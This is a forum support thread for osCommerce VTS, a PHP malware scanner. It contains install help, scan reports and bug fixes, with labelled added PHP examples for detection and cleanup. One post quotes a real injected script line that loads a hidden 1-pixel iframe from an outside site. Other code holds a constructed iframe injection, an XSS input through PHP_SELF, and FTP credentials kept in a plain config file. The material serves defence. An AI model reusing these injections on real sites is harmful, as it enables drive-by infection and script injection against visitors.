osCommerce VTS



osCommerce VTS - Virus & Threat Scanner

Support thread

(Please be kind to me since English is not my first language)

Welcome to osCommerce VTS. In the ever-decreasing world of Internet security, web servers are fast becoming a target for spammers and authors of malicious code to spread their nasties.

Server security is paramount, and the spread of malicious code can be prevented by competent administrators and knowledgeable web masters. But why not be on the safe side?

osCommerce VTS is designed to run on your web server and scan your public web files for malicious code. It is small, portable and efficient, uses minimal server resources, and provides a full report on what has been discovered.

This software is provided as-is, without warranty or guarantee of any kind. Use at your own risk.

osCommerce VTS runs on Linux web servers (it has been known to function under Windows), and is optimised to run on shared web hosting accounts.

Although osCommerce VTS may function with older versions, it remains untested and unsupported. Therefore I recommend you have the following installed on your server:

* Apache 1.3 or higher
* PHP 4.3.x or higher

 

What osCommerce VTS does:

* Scan for known *.php hacker files
* Scan for known hacker sites & IPs
* Scan for known suspicious code
* Scan all types of files on your site (not only php files)
* Scan for open tag inside GIF image
* Scan for possible shell execution
* Scan for suspicious COOKIE references

...and more to come..

 

 

The contribution can be found at:

osCommerce VTS

Link to comment
Share on other sites

Forgive my limited experience...

 

Just need a little clarification of instructions.

 

* Edit config.php to your needs......What would my needs be? Is some modification needed?

 

* CHMOD all files 755 or lower.......What does CHMOD mean?

 

* - add above:

<!--osCommerce Virus & Threat Scan -->

<?php

echo ' | <a href="AV/' . 'index.php" class="headerLink">' . 'Virus & Threat Scan' . '</a>';

?>

<!--osCommerce Virus & Threat Scan -->

 

................Add this above the first </td> ?

 

Thanks,

~*Beth

Link to comment
Share on other sites

Having trouble pinpointing it. This is my header.php. So where do I add the code?

Thanks so much. Appreciate it!

 

<?php
/*
$Id: header.php 3 2006-05-27 04:59:07Z user $

osCMax Power E-Commerce
http://oscdox.com

Copyright 2006 osCMax2005 osCMax, 2002 osCommerce

Released under the GNU General Public License
*/

if ($messageStack->size > 0) {
echo $messageStack->output();
}
?>
<table border="0" width="100%" cellspacing="0" cellpadding="0">
<tr>
<td><?php echo '<a href="http://www.oscmax.com">' . tep_image(DIR_WS_IMAGES . 'oscmax-logo.png', 'osCMax v2.0', '85', '80') . '</a>'; ?></td>
<td align="right"><?php echo '<a href="http://www.oscmax.com/" target="_blank">' . tep_image(DIR_WS_IMAGES . 'header_support.gif', HEADER_TITLE_SUPPORT_SITE, '50', '50') . '</a>  <a href="' . tep_catalog_href_link() . '">' . tep_image(DIR_WS_IMAGES . 'header_checkout.gif', HEADER_TITLE_ONLINE_CATALOG, '53', '50') . '</a>  <a href="' . tep_href_link(FILENAME_DEFAULT, '', 'NONSSL') . '">' . tep_image(DIR_WS_IMAGES . 'header_administration.gif', HEADER_TITLE_ADMINISTRATION, '50', '50') . '</a>'; ?>  </td>
</tr>
<tr class="headerBar">
<?php /* BOF: MOD - Admin Security */ ?>
<?php /* old- <td class="headerBarContent">  <?php echo '<a href="' . tep_href_link(FILENAME_DEFAULT, '', 'NONSSL') . '" class="headerLink">' . HEADER_TITLE_TOP . '</a>'; ?></td> */ ?>
<?php /* old- <td class="headerBarContent" align="right"><?php echo '<a href="http://www.oscmax.com" class="headerLink">' . HEADER_TITLE_SUPPORT_SITE . '</a>  |  <a href="' . tep_catalog_href_link() . '" class="headerLink">' . HEADER_TITLE_ONLINE_CATALOG . '</a>  |  <a href="' . tep_href_link(FILENAME_DEFAULT, '', 'NONSSL') . '" class="headerLink">' . HEADER_TITLE_ADMINISTRATION . '</a>'; ?>  </td> */ ?>
<td class="headerBarContent">  
<?php
if (tep_session_is_registered('login_id')) {
echo '<a href="' . tep_href_link(FILENAME_ADMIN_ACCOUNT, '', 'SSL') . '" class="headerLink">' . HEADER_TITLE_ACCOUNT . '</a> | <a href="' . tep_href_link(FILENAME_LOGOFF, '', 'NONSSL') . '" class="headerLink">' . HEADER_TITLE_LOGOFF . '</a>';
} else {
echo '<a href="' . tep_href_link(FILENAME_DEFAULT, '', 'NONSSL') . '" class="headerLink">' . HEADER_TITLE_TOP . '</a>';
}
?></td>
<td class="headerBarContent" align="right"><?php echo '  <a href="https://www.oscmax.com/" target="_blank" class="headerLink">osCMax.com</a>  |  <a href="http://shop.oscmax.com" class="headerLink">' . HEADER_TITLE_OSCDOX . '</a>  |   <a href="' . tep_catalog_href_link() . '" class="headerLink">' . HEADER_TITLE_ONLINE_CATALOG . '</a>  |  <a href="' . tep_href_link(FILENAME_DEFAULT, '', 'NONSSL') . '" class="headerLink">' . HEADER_TITLE_ADMINISTRATION . '</a>'; ?>  </td>
<?php /* EOF: MOD - Admin Security */ ?>

</tr>
</table>

Link to comment
Share on other sites

Forgive my limited experience...

 

Just need a little clarification of instructions.

 

* Edit config.php to your needs......What would my needs be? Is some modification needed?

e.g. You can configure where you want the program to start the scan:

$CONFIG['scanpath'] = $_SERVER['DOCUMENT_ROOT'];

or

$CONFIG['scanpath'] = $_SERVER['DOCUMENT_ROOT']."/catalog";

 

* CHMOD all files 755 or lower.......What does CHMOD mean?

You have to set file permission to 755 or lower

 

* - add above:

<!--osCommerce Virus & Threat Scan -->

<?php

echo ' | <a href="AV/' . 'index.php" class="headerLink">' . 'Virus & Threat Scan' . '</a>';

?>

<!--osCommerce Virus & Threat Scan -->

 

................Add this above the first </td> ?

See my reply on your next message..

Link to comment
Share on other sites

Having trouble pinpointing it. This is my header.php. So where do I add the code?

Thanks so much. Appreciate it!

 

Here is your updated header.php file. I have inserted the code for osCommerce VTS in it:

<?php
/*
$Id: header.php 3 2006-05-27 04:59:07Z user $

 osCMax Power E-Commerce
 http://oscdox.com

 Copyright 2006 osCMax2005 osCMax, 2002 osCommerce

 Released under the GNU General Public License
*/

 if ($messageStack->size > 0) {
   echo $messageStack->output();
 }
?>
<table border="0" width="100%" cellspacing="0" cellpadding="0">
 <tr>
   <td><?php echo '<a href="http://www.oscmax.com">' . tep_image(DIR_WS_IMAGES . 'oscmax-logo.png', 'osCMax v2.0', '85', '80') . '</a>'; ?></td>
   <td align="right"><?php echo '<a href="http://www.oscmax.com/" target="_blank">' . tep_image(DIR_WS_IMAGES . 'header_support.gif', HEADER_TITLE_SUPPORT_SITE, '50', '50') . '</a>  <a href="' . tep_catalog_href_link() . '">' . tep_image(DIR_WS_IMAGES . 'header_checkout.gif', HEADER_TITLE_ONLINE_CATALOG, '53', '50') . '</a>  <a href="' . tep_href_link(FILENAME_DEFAULT, '', 'NONSSL') . '">' . tep_image(DIR_WS_IMAGES . 'header_administration.gif', HEADER_TITLE_ADMINISTRATION, '50', '50') . '</a>'; ?>  </td>
 </tr>
 <tr class="headerBar">
<?php /* BOF: MOD - Admin Security */ ?>
<?php /* old- <td class="headerBarContent">  <?php echo '<a href="' . tep_href_link(FILENAME_DEFAULT, '', 'NONSSL') . '" class="headerLink">' . HEADER_TITLE_TOP . '</a>'; ?></td> */ ?>
<?php /* old- <td class="headerBarContent" align="right"><?php echo '<a href="http://www.oscmax.com" class="headerLink">' . HEADER_TITLE_SUPPORT_SITE . '</a>  |  <a href="' . tep_catalog_href_link() . '" class="headerLink">' . HEADER_TITLE_ONLINE_CATALOG . '</a>  |  <a href="' . tep_href_link(FILENAME_DEFAULT, '', 'NONSSL') . '" class="headerLink">' . HEADER_TITLE_ADMINISTRATION . '</a>'; ?>  </td> */ ?>
   <td class="headerBarContent">  
<?php
 if (tep_session_is_registered('login_id')) {
   echo '<a href="' . tep_href_link(FILENAME_ADMIN_ACCOUNT, '', 'SSL') . '" class="headerLink">' . HEADER_TITLE_ACCOUNT . '</a> | <a href="' . tep_href_link(FILENAME_LOGOFF, '', 'NONSSL') . '" class="headerLink">' . HEADER_TITLE_LOGOFF . '</a>';
 } else {
   echo '<a href="' . tep_href_link(FILENAME_DEFAULT, '', 'NONSSL') . '" class="headerLink">' . HEADER_TITLE_TOP . '</a>';
 }
   ?>
<!--osCommerce Virus & Threat Scan -->
<?php
echo ' | <a href="AV/' . 'index.php" class="headerLink">' . 'Virus & Threat Scan' . '</a>';
?>
<!--osCommerce Virus & Threat Scan -->
</td>
   <td class="headerBarContent" align="right"><?php echo '  <a href="https://www.oscmax.com/" target="_blank" class="headerLink">osCMax.com</a>  |  <a href="http://shop.oscmax.com" class="headerLink">' . HEADER_TITLE_OSCDOX . '</a>  |   <a href="' . tep_catalog_href_link() . '" class="headerLink">' . HEADER_TITLE_ONLINE_CATALOG . '</a>  |  <a href="' . tep_href_link(FILENAME_DEFAULT, '', 'NONSSL') . '" class="headerLink">' . HEADER_TITLE_ADMINISTRATION . '</a>'; ?>  </td>
<?php /* EOF: MOD - Admin Security */ ?>

 </tr>
</table>

 

Hope this helps.

Remember to BACKUP before you make any changes on your site!

Link to comment
Share on other sites

Hello,

Is any of these messages a problem?

 

public_html/magazin/admin/includes/functions/general.php...SUSPECTED (shell execution)

public_html/blog/wp-content/themes/gothamnews/footer.php...SUSPECTED (eval/base64_decode found)

public_html/magazinoriginal/includes/classes/recent_history.php (Traversal Exploit <=> cp( )

public_html/blog/wp-admin/plugin-editor.php (Known automated hack <=> iframe)

public_html/blog/wp-admin/includes/class-wp-filesystem-ssh2.php (Traversal Exploit <=> chown( )

public_html/blog/wp-admin/includes/class-wp-filesystem-ssh2.php (Traversal Exploit <=> chgrp( )

public_html/blog/wp-includes/http.php (Known automated hack <=> error_reporting(0) )

 

Thanks

Edited by danut82
Link to comment
Share on other sites

Hello,

Is any of these messages a problem?

 

public_html/magazin/admin/includes/functions/general.php...SUSPECTED (shell execution)

 

I have the same report for this file, no problem.

But to be sure, compare it with the original one.

 

public_html/blog/wp-content/themes/gothamnews/footer.php...SUSPECTED (eval/base64_decode found)

public_html/magazinoriginal/includes/classes/recent_history.php (Traversal Exploit <=> cp( )

public_html/blog/wp-admin/plugin-editor.php (Known automated hack <=> iframe)

public_html/blog/wp-admin/includes/class-wp-filesystem-ssh2.php (Traversal Exploit <=> chown( )

public_html/blog/wp-admin/includes/class-wp-filesystem-ssh2.php (Traversal Exploit <=> chgrp( )

public_html/blog/wp-includes/http.php (Known automated hack <=> error_reporting(0) )

 

These files I don't know since it is a contribution I don't use.

You should compare these files with the original ones to see if there are any changes that should not be in them.

Link to comment
Share on other sites
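Added example, not part of the thread and not osCommerce VTS code: one way to do the "compare with the original" step for a whole tree, by hashing the live site and an unpacked copy of the original release. The directory layout, file names and contents are constructed for the demo.

```php
<?php
// Added example, not osCommerce VTS code. Directories and file contents are constructed.

/** Map of relative path => SHA-256 for every file below $root. */
function hashTree(string $root): array
{
    $root = rtrim($root, '/');
    $map = [];
    $files = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($files as $file) {
        if ($file->isFile()) {
            $relative = substr($file->getPathname(), strlen($root) + 1);
            $map[$relative] = hash_file('sha256', $file->getPathname());
        }
    }
    return $map;
}

/** Compare the live site against an unpacked copy of the original release. */
function compareWithOriginal(string $liveDir, string $originalDir): array
{
    $live = hashTree($liveDir);
    $orig = hashTree($originalDir);
    $modified = [];
    foreach (array_intersect_key($live, $orig) as $relative => $hash) {
        if ($hash !== $orig[$relative]) {
            $modified[] = $relative;
        }
    }
    return [
        'modified' => $modified,
        'added'    => array_keys(array_diff_key($live, $orig)),
        'missing'  => array_keys(array_diff_key($orig, $live)),
    ];
}

/** Helper for the demo: write a file, creating its directory first. */
function putFile(string $path, string $data): void
{
    if (!is_dir(dirname($path))) {
        mkdir(dirname($path), 0700, true);
    }
    file_put_contents($path, $data);
}

$base = sys_get_temp_dir() . '/cmp_' . uniqid();
putFile("$base/original/includes/functions/general.php", "<?php // release copy\n");
putFile("$base/original/themes/footer.php", "<?php // footer\n");
putFile("$base/live/includes/functions/general.php", "<?php // release copy\n");
putFile("$base/live/themes/footer.php", "<?php // footer\n// constructed extra line\n");
putFile("$base/live/images/thumb.php", "<?php // file not in the release\n");
print_r(compareWithOriginal("$base/live", "$base/original"));
```

Files listed under `modified` or `added` are the ones to read by hand; files you changed yourself when installing contributions will show up there too.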

  • 3 weeks later...

Somebody injected one of our java scripts with the code below, and it has not been detected.

 

var jquery = '<iframe height=1 width=1 border=0 src="http://

melopp.biz/fol/?606717496665bcba"> </iframe>';

 

Oooops. A small check is missing in the code, which causes the scanner to NOT scan files with a 2, 4 or 5 letter extension.

I have fixed this and will UL a new version today.

Thanks for pointing this out for me!

Link to comment
Share on other sites
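Added example, not part of the thread and not osCommerce VTS code: a scan for 1-pixel or hidden iframes that takes the file extension with `pathinfo()`, so 2-, 4- and 5-letter extensions are handled like 3-letter ones. The extension list, file names and the `injected.example.invalid` host are constructed.

```php
<?php
// Added example, not osCommerce VTS code. Sample files and the host name are constructed.

/** Extensions treated as text; lengths 2 to 5 on purpose. */
const TEXT_EXT = ['js', 'php', 'css', 'htm', 'html', 'phtml'];

/** Return every <iframe> tag that is 0/1 pixel in size or hidden by CSS. */
function findHiddenIframes(string $content): array
{
    $hits = [];
    preg_match_all('/<iframe\b[^>]*>/is', $content, $m, PREG_OFFSET_CAPTURE);
    foreach ($m[0] as [$tag, $offset]) {
        $tiny   = preg_match('/\b(?:height|width)\s*=\s*["\']?[01](?:px)?\b/i', $tag);
        $hidden = preg_match('/display\s*:\s*none|visibility\s*:\s*hidden/i', $tag);
        if ($tiny || $hidden) {
            $hits[] = [
                'line' => substr_count(substr($content, 0, $offset), "\n") + 1,
                'tag'  => preg_replace('/\s+/', ' ', $tag),
            ];
        }
    }
    return $hits;
}

/** Walk $root and scan every text file, whatever the length of its extension. */
function scanTree(string $root): array
{
    $report = [];
    $files = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($files as $file) {
        // pathinfo() takes everything after the last dot, so no length is assumed.
        $ext = strtolower(pathinfo($file->getFilename(), PATHINFO_EXTENSION));
        if (!$file->isFile() || !in_array($ext, TEXT_EXT, true)) {
            continue;
        }
        foreach (findHiddenIframes(file_get_contents($file->getPathname())) as $hit) {
            $report[] = $file->getPathname() . ':' . $hit['line'] . ' ' . $hit['tag'];
        }
    }
    return $report;
}

// Constructed demo tree: the same injected line in files with 2-, 3- and 4-letter extensions.
$root = sys_get_temp_dir() . '/vts_demo_' . uniqid();
mkdir($root);
$bad = "var ok = 1;\nvar jquery = '<iframe height=1 width=1 border=0 "
     . "src=\"http://injected.example.invalid/x\"> </iframe>';\n";
foreach (['menu.js', 'page.php', 'index.html'] as $name) {
    file_put_contents("$root/$name", $bad);
}
file_put_contents("$root/clean.js", "var a = '<iframe width=\"560\" height=\"315\"></iframe>';\n");
print_r(scanTree($root));
```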

  • 2 weeks later...

A new version is now made available : osCommerce VTS 1.0.5

 

What's new:

* Added check for leading & trailing whitespace in .php files

 

I added this check because of all the problems people out there have with leading and trailing whitespace.

As Spook said:

"very common issue after editing with the likes of filemanager, to add confusion, spaces at the end do not always cause issues at first, but issues can randomly occur later, maybe just through re-uploading the same file!! "

 

Link to comment
Share on other sites

Thanks for this contribution, I'll install it soon.

 

Just a quick question with regards to your newest scan for whitespace in php files,

is it possible for you to include the option to delete these trailing whitespaces?

 

I'm sure this would be useful for many people especially after having had code injected into all php files (which is what recently happened to me and who knows how many others using Godaddy LOL).

 

Thanks.

Link to comment
Share on other sites

Thanks for this contribution, I'll install it soon.

Just a quick question with regards to your newest scan for whitespace in php files,

is it possible for you to include the option to delete these trailing whitespaces?

I'm sure this would be useful for many people especially after having had code injected into all php files (which is what recently happened to me and who knows how many others using Godaddy LOL).

 

I have implemented that for the next version, but I need to do some more testing of it..

Link to comment
Share on other sites

Great, looking forward to it.

 

I have another question/suggestion (you can read more about it here) http://www.oscommerce.com/forums/topic/358244-php-self/

with regards to PHP_SELF in code, can cause problems.

 

For interest sake I searched for this term in my Oscommerce files and it appears several hundred times.

 

What are your comments on this? (I'm not a coder hence the question).

Link to comment
Share on other sites

Great, looking forward to it.

I have another question/suggestion (you can read more about it here) http://forums.oscomm...58244-php-self/

with regards to PHP_SELF in code, can cause problems.

For interest sake I searched for this term in my Oscommerce files and it appears several hundred times.

What are your comments on this? (I'm not a coder hence the question).

 

I haven't studied php_self much, but yes, it can cause problems like Cross Site Scripting (XSS).

And yes, php_self is used a lot in osCommerce. I am not an expert on this, but what is said about this is:

"Every PHP_SELF should be converted to HTML entities, with a function like htmlentities"

There are contributions for osCommerce that prevent XSS.

If you have not already done it, then read How to secure your site

Link to comment
Share on other sites
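Added example, not part of the thread and not osCommerce code: the quoted advice about converting PHP_SELF to HTML entities, shown as a raw form action beside the escaped one, plus a rough audit helper for the "several hundred" occurrences mentioned above. The request value, the source lines and the function names are constructed.

```php
<?php
// Added example, not osCommerce code. Request values and source lines are constructed.

/** Risky form: PHP_SELF written into the page exactly as the client shaped it. */
function formActionRaw(array $server): string
{
    return '<form action="' . $server['PHP_SELF'] . '" method="post">';
}

/** Same form with PHP_SELF converted to HTML entities first. */
function formActionEscaped(array $server): string
{
    $self = htmlentities($server['PHP_SELF'], ENT_QUOTES, 'UTF-8');
    return '<form action="' . $self . '" method="post">';
}

/** Heuristic audit: lines that mention PHP_SELF with no escaping call on the same line. */
function unescapedPhpSelfLines(string $source): array
{
    $flagged = [];
    foreach (preg_split('/\R/', $source) as $i => $line) {
        $escaped = preg_match('/htmlentities|htmlspecialchars/i', $line);
        if (stripos($line, 'PHP_SELF') !== false && !$escaped) {
            $flagged[$i + 1] = trim($line);
        }
    }
    return $flagged;
}

// PHP_SELF is the script name plus any extra path the client appended to the URL.
$server = ['PHP_SELF' => '/catalog/login.php/"><b>injected</b>'];
echo formActionRaw($server), "\n";     // the attribute is closed early by the request path
echo formActionEscaped($server), "\n"; // quotes and angle brackets are sent as entities

// Constructed source lines to audit; the third is an assignment, not output.
$sample = <<<'SRC'
echo '<form action="' . $_SERVER['PHP_SELF'] . '">';
echo '<form action="' . htmlentities($_SERVER['PHP_SELF'], ENT_QUOTES) . '">';
$page = basename($PHP_SELF);
SRC;
print_r(unescapedPhpSelfLines($sample));
```

The audit is line-based, so it also flags uses that never reach the page; each flagged line still needs to be read.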

  • 2 weeks later...

A New version has been uploaded.

 

What's new:

* Added new file for handling whitespace configuration (whitespace.php)

* Added choice for removing leading and trailing whitespace

 

REMEMBER BACKUP!!

================

Link to comment
Share on other sites
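Added example, not part of the thread and not the contribution's whitespace.php: a sketch of the leading/trailing whitespace check from version 1.0.5 and the removal option from this release, with the backup taken before a file is rewritten. Function names, file names and the backup location are assumptions.

```php
<?php
// Added example, not osCommerce VTS code. File names and contents below are constructed.

/** List bytes around the PHP tags that would be sent to the browser as output. */
function whitespaceIssues(string $src): array
{
    $issues = [];
    if (strncmp($src, "\xEF\xBB\xBF", 3) === 0) {
        $issues[] = 'UTF-8 BOM before the opening tag';
    } elseif (preg_match('/^\s+<\?/', $src)) {
        $issues[] = 'whitespace before the opening tag';
    }
    $pos = strrpos($src, '?>');
    if ($pos !== false) {
        $tail = (string) substr($src, $pos + 2);
        // PHP swallows one newline directly after the closing tag; the rest is output.
        $rest = preg_replace('/^\r?\n/', '', $tail, 1);
        if ($rest !== '' && trim($rest) === '') {
            $issues[] = 'whitespace after the closing tag';
        }
    }
    return $issues;
}

/** Remove BOM/whitespace before the opening tag and after the final closing tag. */
function stripEdgeWhitespace(string $src): string
{
    $src = preg_replace('/^(?:\xEF\xBB\xBF)?\s*(?=<\?)/', '', $src, 1);
    return preg_replace('/\?>\s+\z/', "?>\n", $src, 1);
}

/** Clean one file, first copying the original to $backupDir (keep it outside the web root). */
function cleanFile(string $path, string $backupDir): array
{
    $src = file_get_contents($path);
    $issues = whitespaceIssues($src);
    if ($issues !== []) {
        copy($path, $backupDir . '/' . basename($path) . '.orig');
        file_put_contents($path, stripEdgeWhitespace($src));
    }
    return $issues;
}

// Constructed demo: one file with a leading blank line and trailing spaces, one clean file.
$web = sys_get_temp_dir() . '/ws_web_' . uniqid();
$bak = sys_get_temp_dir() . '/ws_bak_' . uniqid();
mkdir($web);
mkdir($bak);
file_put_contents("$web/dirty.php", "\n<?php echo 'hi'; ?>\n  \n");
file_put_contents("$web/clean.php", "<?php echo 'hi'; ?>\n");
foreach (['dirty.php', 'clean.php'] as $name) {
    $found = cleanFile("$web/$name", $bak);
    echo $name . ': ' . ($found ? implode(', ', $found) : 'clean') . "\n";
}
```

Backups are written to a separate directory because a copy of a PHP file left in the web root under another extension can be served as plain text.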

  • 3 months later...

======== On ocVTS.php ========

 

ABOVE the results, I get THOUSANDS of the following error:

 

Notice: Undefined variable: flagThreat in /[server path]/public_html/[catalog dir.name]/[my renamed admin]/AV/ocVTS.php on line 143

 

I deleted file_manager.php prior to installing VTS. Why am I getting this line -- literally -- thousands of times?

 

BELOW the results, it tells me that I should rename my admin directory. I did that prior to installing VTS, so I'm not sure why it says that.

 

======== On ocVTSa.php ========

 

No notices/errors other than the actual results, just 19 counts of (shell execution) that I need to inspect against original files.

 

-------------------------

 

Aside: I never used any version prior to 1.0.6, and yet index.php tells me "New version available: v1.0.5"

Edited by hetmana
Link to comment
Share on other sites

======== On ocVTS.php ========

 

ABOVE the results, I get THOUSANDS of the following error:

 

Notice: Undefined variable: flagThreat in /[server path]/public_html/[catalog dir.name]/[my renamed admin]/AV/ocVTS.php on line 143

Fixed in next release.. sorry..

 

I deleted file_manager.php prior to installing VTS. Why am I getting this line -- literally -- thousands of times?

This I don't know, could you post here the listing from ocVTS please?

 

BELOW the results, it tells me that I should rename my admin directory. I did that prior to installing VTS, so I'm not sure why it says that.

It is looking for any case of an admin dir. If you have other utils installed that have an admin dir, then ocVTS will report that..

 

Aside: I never used any version prior to 1.0.6, and yet index.php tells me "New version available: v1.0.5"

This was a little miss. It is fixed now..

Link to comment
Share on other sites

Notice: Undefined variable: flagThreat in /[server path]/public_html/[catalog dir.name]/[my renamed admin]/AV/ocVTS.php on line 143

 

I deleted file_manager.php prior to installing VTS. Why am I getting this line -- literally -- thousands of times?

This I don't know, could you post here the listing from ocVTS please?

Line 143 is the line that is specifically looking for file_manager.php.

 

I assume that's what you mention fixing in the next release (?)

 

Thanks for jumping on this so quickly -- MUCH appreciated!! B)

Link to comment
Share on other sites

Line 143 is the line that is specifically looking for file_manager.php.

 

I assume that's what you mention fixing in the next release (?)

flagThreat is a variable that flags all threats, not specific to file_manager.php

Just to be sure, did you get this line listed:

You should delete file_manager.php from your admin folder !

Link to comment
Share on other sites

A new version released today.

 

What's new:

* Implemented a grep function where you can search your site for your own keywords

* Fixed an undefined variable bug

* Fixed ocVTS to check for only osCommerce's renamed admin dir

Have fun!

Link to comment
Share on other sites

I can't connect

 

Warning: ftp_login() [function.ftp-login]: Login incorrect in /public_html/catalog/admin/AV/ocVTS.php on line 233

 

Fatal error: Call to undefined function: ftp_chmod() in /public_html/catalog/admin/AV/ocVTS.php on line 234

 

Where is the issue? Thanks

 

Did you fill in these in whitespace.php :

$ftp_site = 'yoursite.com';  // your ftp site
$ftp_usr  = 'username';      // your ftp username
$ftp_pwd  = 'password';      // your ftp password
$ftp_root = 'public_html';   // your ftp site root folder

Link to comment
Share on other sites
